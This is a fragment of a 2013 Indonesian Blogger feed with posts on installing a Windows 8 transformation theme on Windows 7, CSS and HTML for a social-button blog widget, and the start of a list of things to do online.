&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig527LUfHXoQ05JsS3F_60D-ci-PxrRBttEDbMCPW6AdseKWrRIcdbWRDJIqZbk3m0Xxms6iMhKXC2cM_1lzkvvnvoBQd400hDkoinxM9qPvMrDUmFvHSeh9WJwjDt8NnKhEdqWeW3iiuf/s1600/5_Transformation_Pack_5.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;proses instal windows 8 ux Pack 6.5&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig527LUfHXoQ05JsS3F_60D-ci-PxrRBttEDbMCPW6AdseKWrRIcdbWRDJIqZbk3m0Xxms6iMhKXC2cM_1lzkvvnvoBQd400hDkoinxM9qPvMrDUmFvHSeh9WJwjDt8NnKhEdqWeW3iiuf/s1600/5_Transformation_Pack_5.jpg&quot; title=&quot;proses instal windows 8 ux Pack 6.5&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Ini tampilan setelah agan selesai instal &lt;span lang=&quot;IN&quot;&gt;windows 8 ux Pack 6.5&lt;/span&gt;, Restart Windows Setelah Proses Installasi Usai.&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;IN&quot;&gt;Jika sobat js sudah melakukan kan nya dengan benar maka tampilan pc atau sobat jadi seperti ini...&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsFhLRM0GfxjKJ5cQiBHTDPS_aerALzJ-U3C3UTKiSp8NpKsLIu8XTy8rWdwLGRlfelPWUnAJIJ_9Ds_NMkZw-UqwEe6Gv5UVmcFIzxHWVewek5SoJU3eb3ZYs8Qgh2xB7Fe91RvMim_Cr/s1600/windows7_windows8_02.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;tampilan windows 8&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsFhLRM0GfxjKJ5cQiBHTDPS_aerALzJ-U3C3UTKiSp8NpKsLIu8XTy8rWdwLGRlfelPWUnAJIJ_9Ds_NMkZw-UqwEe6Gv5UVmcFIzxHWVewek5SoJU3eb3ZYs8Qgh2xB7Fe91RvMim_Cr/s1600/windows7_windows8_02.jpg&quot; title=&quot;tampilan windows 8&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKJECG8fRHoGxpdwcuT3WtAFAH0hL_IDSNACuDN20P57vH0nHfyXg_yA1tQF68WYh0K1ezLYz9-M3bI9Za5ifHV_pql8pZ65jGe4NoRnXeiCYhvcuTubPk3a5aWqIed1PS0hynHtjPaJta/s1600/win+8+ts.jpg&quot;&gt;&lt;img alt=&quot;tampilan windows 8&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKJECG8fRHoGxpdwcuT3WtAFAH0hL_IDSNACuDN20P57vH0nHfyXg_yA1tQF68WYh0K1ezLYz9-M3bI9Za5ifHV_pql8pZ65jGe4NoRnXeiCYhvcuTubPk3a5aWqIed1PS0hynHtjPaJta/s1600/win+8+ts.jpg&quot; title=&quot;tampilan windows 8&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Tampilan os win 8 admin :D mau ?&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Ups hapir lupa jangan lupa buat system restore doeloe, takut nya ada hal yang tidak di inginkan.&lt;br /&gt;
Bagi sobat atau juragan yang belum tau cara buat system restore di windows 7 nich aku kasih tau cara nya:&lt;br /&gt;
&lt;br /&gt;
Start =&amp;gt; klik kanan Computer =&amp;gt; Properties =&amp;gt; System Protection
 =&amp;gt; Create. Hal ini penting jika nanti ada masalah setelah mengubah 
Windows 7 ke Windows 8, kamu bisa merestorenya melalui Start =&amp;gt; All 
Programs =&amp;gt; Accessories =&amp;gt; System Tools =&amp;gt; System restore.&lt;br /&gt;
&lt;br /&gt;
Ok gan ane rasa cukup, ma&#39;af ye kalau ada yang kurang berkenan :D semoga bermanfaat by mimin.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://jeparasoftware.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Sumber &lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5307628277330019668/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-merubah-windows-7-ke-windows-8.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5307628277330019668'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5307628277330019668'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-merubah-windows-7-ke-windows-8.html' title='Cara Merubah Windows 7 Ke Windows 8'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik4CxocgYWsWD1W3X9FBEarvn2h8DAg_fqe2d7EZGKAMV027feIAookfpIFP4p7LRE4Pdrnrnq5QV7hLKBfHzzPG95KbUsA6MCbEQ3jgdL7__xLooH3ECy6PLxBK2oUKaLwlEFtzCE7peu/s72-c/win+trans.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-8776499505473714209</id><published>2013-02-26T04:20:00.000-08:00</published><updated>2013-02-26T04:27:13.518-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Download"/><title type='text'>Free Download Tema Windows 8 Transformation Pack For Windows 7</title><content type='html'>&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;post-thumbnail-left&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;
&lt;img alt=&quot;windows-8-transformation-pack-untuk-windows-7&quot; class=&quot;attachment-post-image-size wp-post-image&quot; height=&quot;184&quot; src=&quot;http://gretonger.info/wp-content/uploads/2012/12/windows-8-transformation-pack-untuk-windows-7-290x168.png&quot; width=&quot;320&quot; /&gt;                        &lt;/div&gt;
Meskipun saat ini &lt;b&gt;windows 8&lt;/b&gt; sudah launching dan kita sudah bisa mencoba baik versi RTM maupun &lt;b&gt;windows 8 pro&lt;/b&gt;
 dan entreprise, namun tidak ada salah nya pula bagi yang masih ragu 
untuk install windows 8 untuk mencoba kulit nya dulu. :D. Kali ini saya 
akan share mengenai &lt;b&gt;Tema Windows 8&lt;/b&gt; yang bisa kita&lt;b&gt; install di windows 7&lt;/b&gt;.&lt;br /&gt;
&lt;b&gt;Windows 8 transformation Pack Versi 6.5&lt;/b&gt; yang akan saya share ini 
merupakan software buatan&amp;nbsp;thememypc yang di khususkan bagi kita untuk 
menikmati sensasi tampilan windows 8 yang notabene sangat menyenangkan 
tersebut.&lt;br /&gt;
Windows 8 Transformation Pack 6.5 ini akan &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/download-gratis-tema-windows-8.html&quot; target=&quot;_blank&quot; title=&quot;Download Tema Windows 8 Transformation Pack Untuk Windows 7&quot;&gt;&lt;b&gt;mengubah Tampilan Windows 7/Vista/XP Anda ke Windows 8&lt;/b&gt;&lt;/a&gt;. Termasuk Windows
 8 Boot Screen, Login Screen, Tema, Wallpaper, Ikon, Suara, Font, Metro /
 Modern UI, Auto-Pewarnaan Aero, Taskbar UserTile dan banyak lagi.&lt;br /&gt;
Pada Versi yang ke 6.5 ini, terdapat beberapa update dari versi-versi
 sebelumnya yang antara lain saya kutip dari website sumbernya adalah:&lt;br /&gt;
&lt;blockquote&gt;
&lt;b&gt;What’s new in 8TP v6.5&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Added ‘Transformation Pack Notes’ in readme about temporary disabling antivirus software&lt;/li&gt;
&lt;li&gt;Changed default Immersive UI back to Charms Bar&lt;/li&gt;
&lt;li&gt;Fixed default user account configuration not checking requirements causing improper configuration&lt;/li&gt;
&lt;li&gt;Fixed font installation using method from version 5.0 with improved API code&lt;/li&gt;
&lt;li&gt;Fixed launcher incompatibilities with limited user account&lt;/li&gt;
&lt;li&gt;Fixed permission problems with 3rd-party applications&lt;/li&gt;
&lt;li&gt;Fixed Windows version checking error that allows installation on Windows 8&lt;/li&gt;
&lt;li&gt;Removed Aero Frame UI from default configuration as some machines find it not stable enough&lt;/li&gt;
&lt;li&gt;Updated Metro Inspirat theme for Windows XP having Modern UI updated on taskbar and start menu (thememypc.com)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;div&gt;
Hal yang perlu diperhatikan sebelum anda menginstall Windows 8 TP 
ini adalah pastikan anda telah membuat checkpoint pada restore point 
komputer anda untuk berjaga-jaga siapa tau ada yang error dengan &lt;b&gt;Windows 8 TP&lt;/b&gt;
 ini di komputer Anda. Jika beberapa fitur tidak berjalan dengan 
maksimal, cek apakan .NET framework versi 4.0 dan 4.5 anda sudah 
terinstal atau belum, jika belum bisa download disini juga pada link dibawah.&lt;/div&gt;
&lt;b&gt;&lt;a href=&quot;http://adf.ly/FVBnR&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Download Windows 8 Transformation Pack (8TP) v6.5&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
Mirror&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://adf.ly/FVBpI&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Download Windows 8 Transformation Pack (8TP) v6.5&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Download&amp;nbsp;&lt;a href=&quot;http://adf.ly/FVBcX&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;.NET Framework 2.0&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Download&amp;nbsp;&lt;a href=&quot;http://adf.ly/FVBhj&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;.NET Framework 4.0&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Download&amp;nbsp;&lt;a href=&quot;http://adf.ly/FVBjp&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;.NET Framework 4.5&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
Sekian&lt;b&gt; &lt;/b&gt;dulu postingan saya kali ini mengenai &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/download-gratis-tema-windows-8.html&quot;&gt;&lt;b&gt;Download Tema Windows 8 Transformation Pack Untuk Windows 7 ini&lt;/b&gt;&lt;/a&gt;, jika agan blum tau cara merubah tampilan windows 7 ke windows 8 baca aja artikel ane ini &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-merubah-windows-7-ke-windows-8.html&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Cara Merubah Windows 7 Ke Windows 8&lt;/span&gt;&lt;/a&gt; semoga bermanfaat...&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Captain-kid &lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/8776499505473714209/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/download-gratis-tema-windows-8.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8776499505473714209'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8776499505473714209'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/download-gratis-tema-windows-8.html' title='Free Download Tema Windows 8 Transformation Pack For Windows 7'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-230646969355591127</id><published>2013-02-23T23:12:00.001-08:00</published><updated>2013-02-23T23:33:32.861-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Membuat Social Button Diblog</title><content type='html'>&lt;img alt=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUWELH-ntmHMwB2pFmPlMZK799v3z9KCi0TJWKvUqz8587_hBmjQMVBY3LUU0tfeP4AsgOluC1F8cTojeN6SSNviJoMPDf6kbuRTU0iboe8Fwp8qFA6g8ez7c7Kb1SUbSkrrRi3Ev3wHaC/s1600/socialbtn.png&quot; class=&quot;decoded&quot; height=&quot;185&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUWELH-ntmHMwB2pFmPlMZK799v3z9KCi0TJWKvUqz8587_hBmjQMVBY3LUU0tfeP4AsgOluC1F8cTojeN6SSNviJoMPDf6kbuRTU0iboe8Fwp8qFA6g8ez7c7Kb1SUbSkrrRi3Ev3wHaC/s400/socialbtn.png&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Hello kawan blogwalkers, ketemu lagi dengan saya &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Captain&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;-&lt;/span&gt;&lt;/span&gt;kid&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
iseng-iseng liat blog &lt;a href=&quot;http://om-dayz.blogspot.com/&quot;&gt;om-dayz.blogspot.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Di lihat-lihat ternyata ada widget yang keren nih gan. Social button yang dibuat &lt;a href=&quot;http://om-dayz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;om-dayz&lt;/span&gt;&lt;/a&gt; emang keren gan, blognya aja simple dan sangat ringan.&lt;br /&gt;
&lt;br /&gt;
Yaudah langsung aja ke &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-social-button-diblog.html&quot;&gt;tutorial cara membuat social button&lt;/a&gt; ala &lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;http://om-dayz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;om-dayz&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;, Cekidot :&lt;br /&gt;
&lt;br /&gt;
1. Buka Template &amp;gt; Edit HTML &amp;gt; &lt;span style=&quot;font-family: inherit;&quot;&gt;Centang&amp;nbsp;&lt;span style=&quot;line-height: 115%;&quot;&gt;&lt;input type=&quot;checkbox&quot; /&gt;Expand Template Widget&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
2. Cari kode &lt;span style=&quot;color: blue;&quot;&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;/span&gt;&lt;br /&gt;
3. Lalu Pastekan kode dibawah tepat diatas kode &lt;span style=&quot;color: blue;&quot;&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;div class=&quot;MsoPlainText&quot; style=&quot;text-align: left;&quot;&gt;
&lt;pre&gt;/* social button */
.staticbar {position: fixed;right: 0;top: 35%;width: 25px;animation:static-bar .8s;-moz-animation:static-bar .8s; -webkit-animation:static-bar .8s;}
.staticbar:hover {z-index: 1000;}
.rt-social-buttons a, .loginbtn {background: none repeat scroll 0 0 rgb(34, 34, 34);background-repeat: no-repeat;display: block;height: 20px;margin-bottom: 3px;padding: 4px 0 4px 4px;right: 0px;width: 140px;position: relative;-moz-border-radius: 3px 0px 0px 3px;-webkit-border-radius: 3px 0px 0px 3px;-khtml-border-radius: 3px 0px 0px 3px;border-radius: 3px 0px 0px 3px;background-position: 4px 4px;-webkit-transition: all 0.3s ease;-moz-transition: all 0.3s ease;-o-transition: all 0.3s ease;transition: all 0.3s ease;border:1px solid rgb(51, 51, 51)}
.rt-social-buttons span, .loginbtn span {background-repeat: no-repeat;color: #FFFFFF;display: block;font-size: 10px;height: 18px;letter-spacing: -1px;line-height: 1.9em;padding-left: 10px;text-transform: uppercase;text-shadow:0px 1px 1px rgba(0, 0, 0, 0.2);}
.rt-social-buttons a:hover, .loginbtn:hover {background: none repeat scroll 0 0 rgb(150, 0, 0);border:1px solid rgb(70, 0, 0);
right: 119px;}
.rt-social-buttons a#rt-buzz-btn span {background-image: url(&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoVaL3n2jAgcYdbiCRv7H-9XBvd0wm67J8OtwqczzmiL630rwsN4gMqQ2NuBxoT0mPgGI6A70j-S3Jo9bxA329VxjoeDIhn2neHPUPlBKzSYiEujAykRJvOWnDygVrTvjdexYDU4PLHX8/s1600/socialsprite.png&lt;/span&gt;);background-position:-2px -68px;}
.rt-social-buttons a#rt-twitter-btn span {background-image: url(&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoVaL3n2jAgcYdbiCRv7H-9XBvd0wm67J8OtwqczzmiL630rwsN4gMqQ2NuBxoT0mPgGI6A70j-S3Jo9bxA329VxjoeDIhn2neHPUPlBKzSYiEujAykRJvOWnDygVrTvjdexYDU4PLHX8/s1600/socialsprite.png&lt;/span&gt;);background-position:-2px -24px;}
.rt-social-buttons a#rt-facebook-btn span {background-image: url(&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoVaL3n2jAgcYdbiCRv7H-9XBvd0wm67J8OtwqczzmiL630rwsN4gMqQ2NuBxoT0mPgGI6A70j-S3Jo9bxA329VxjoeDIhn2neHPUPlBKzSYiEujAykRJvOWnDygVrTvjdexYDU4PLHX8/s1600/socialsprite.png&lt;/span&gt;);background-position:-2px -46px;}
.rt-social-buttons a#rt-rss-btn span {background-image: url(&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoVaL3n2jAgcYdbiCRv7H-9XBvd0wm67J8OtwqczzmiL630rwsN4gMqQ2NuBxoT0mPgGI6A70j-S3Jo9bxA329VxjoeDIhn2neHPUPlBKzSYiEujAykRJvOWnDygVrTvjdexYDU4PLHX8/s1600/socialsprite.png&lt;/span&gt;);background-position:-2px -89px;}
a.loginbtn span {background-image: url(&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoVaL3n2jAgcYdbiCRv7H-9XBvd0wm67J8OtwqczzmiL630rwsN4gMqQ2NuBxoT0mPgGI6A70j-S3Jo9bxA329VxjoeDIhn2neHPUPlBKzSYiEujAykRJvOWnDygVrTvjdexYDU4PLHX8/s1600/socialsprite.png&lt;/span&gt;);background-position:-2px 0px;}
&lt;span style=&quot;color: #bf9000;&quot;&gt;@keyframes static-bar{0%   {right:-25px;} 100%   {right:0px;}}
@-moz-keyframes static-bar{0%   {right:-25px;} 100%   {right:0px;}}
@-webkit-keyframes static-bar{0%   {right:-25px;} 100%   {right:0px;}}&lt;/span&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
4. Lalu cari tag &lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;/body&amp;gt; &lt;/span&gt;&lt;br /&gt;
5. Paste kan kode dibawah tepat diatas kode &lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&amp;lt;div class=&#39;staticbar&#39;&amp;gt;
&amp;lt;div class=&#39;login&#39;&amp;gt;
&amp;lt;div id=&#39;rt-login-button&#39;&amp;gt;
&amp;lt;a class=&#39;loginbtn buttontext&#39; href=&#39;http://blogger.com&#39; rel=&#39;nofollow&#39; target=&#39;_blank&#39; title=&#39;Login Blogger&#39;&amp;gt;
&amp;lt;span class=&#39;desc&#39;&amp;gt;Blogger Login&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div class=&#39;clear&#39;/&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div class=&#39;rt-social-buttons&#39;&amp;gt;
&amp;lt;a class=&#39;lightbox&#39; data-options=&#39;{&amp;amp;quot;width&amp;amp;quot;:420, &amp;amp;quot;height&amp;amp;quot;:405, &amp;amp;quot;iframe&amp;amp;quot;: true}&#39; href=&#39;&lt;span style=&quot;color: red;&quot;&gt;http://twitter.com/USERNAMEANDA&lt;/span&gt;&#39; id=&#39;rt-twitter-btn&#39; rel=&#39;nofollow&#39; title=&#39;&lt;span style=&quot;color: red;&quot;&gt;Twitter Hack4rt&lt;/span&gt;&#39;&amp;gt;
&amp;lt;span&amp;gt;Follow Me On Twitter&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;a class=&#39;lightbox&#39; data-options=&#39;{&amp;amp;quot;width&amp;amp;quot;:300, &amp;amp;quot;height&amp;amp;quot;:430, &amp;amp;quot;iframe&amp;amp;quot;: true}&#39; href=&#39;&lt;span style=&quot;color: red;&quot;&gt;http://facebook.com/USERNAMEANDA&lt;/span&gt;&#39; id=&#39;rt-facebook-btn&#39; rel=&#39;nofollow&#39; title=&#39;&lt;span style=&quot;color: red;&quot;&gt;Facebook Hack4rt&lt;/span&gt;&#39;&amp;gt;
&amp;lt;span&amp;gt; Facebook Fanspage&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;a href=&#39;&lt;span style=&quot;color: red;&quot;&gt;https://gplus.to/USERNAMEANDA&lt;/span&gt;&#39; id=&#39;rt-buzz-btn&#39; rel=&#39;nofollow&#39; target=&#39;_blank&#39; title=&#39;&lt;span style=&quot;color: red;&quot;&gt;Google Plus Hack4rt&lt;/span&gt;&#39;&amp;gt;
&amp;lt;span&amp;gt;Circle Me On Google Plus&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;script src=&#39;http://ganteng-project.googlecode.com/svn/trunk/om-dayz/panelticon.js&#39; type=&#39;text/javascript&#39;/&amp;gt;&lt;/pre&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;color: white;&quot;&gt;6. Ganti Tulisan &quot;&lt;span style=&quot;color: red;&quot;&gt;USERNAMEANDA&lt;/span&gt;&quot; dengan username kalian.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Itulah sekilas &lt;b&gt;Tutorial Blogger&lt;/b&gt; mengenai &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-social-button-diblog.html&quot;&gt;Cara membuat social button&lt;/a&gt;.
 Semoga bermanfaat. Kekurangan saya mohon maaf, yang baik silakan diambil 
yang buruk mohon diperbaiki, karena sempurna hanya milik allah SWT yang 
maha kuasa dan juga lagu milik andra and the backbone. Trimakasih....!&lt;/span&gt;&amp;nbsp; &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Captain-kid&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt; &lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/230646969355591127/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-social-button-diblog.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/230646969355591127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/230646969355591127'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-social-button-diblog.html' title='Cara Membuat Social Button Diblog'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUWELH-ntmHMwB2pFmPlMZK799v3z9KCi0TJWKvUqz8587_hBmjQMVBY3LUU0tfeP4AsgOluC1F8cTojeN6SSNviJoMPDf6kbuRTU0iboe8Fwp8qFA6g8ez7c7Kb1SUbSkrrRi3Ev3wHaC/s72-c/socialbtn.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5089314453090766533</id><published>2013-02-23T07:20:00.001-08:00</published><updated>2013-02-24T22:10:38.193-08:00</updated><title type='text'>10 Hal Yang Dapat Dilakukan Di Internet</title><content type='html'>&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
10 hal yang dapat dilakukan di Internet
&lt;/h3&gt;
saya akan membahas 10 hal yang bisa dilakukan di internet, ini dia cekidot :&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
1. &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Surfing Internet&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;
Hal yang sering dilakukan oleh orang ketika melakukan koneksi internet 
adalah melakukan surfing internet yaitu menjelajahi setiap halaman web 
yang telah disediakan oleh google maupun yang tidak tedaftar dengan 
google.&amp;nbsp;Menambah wawasan dan ilmu pengetahuan dengan cepat dan mudah 
tanpa harus mondar-mandir pergi ke perpustakaan atau toko buku. Browsing
 memberikan kemudahan akses informasi yang bisa diakses kapan saja 
dimana saja, tentunya asalkan terjangkau jaringan internet.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=8688056575447479178&quot;&gt;&lt;img border=&quot;0&quot; 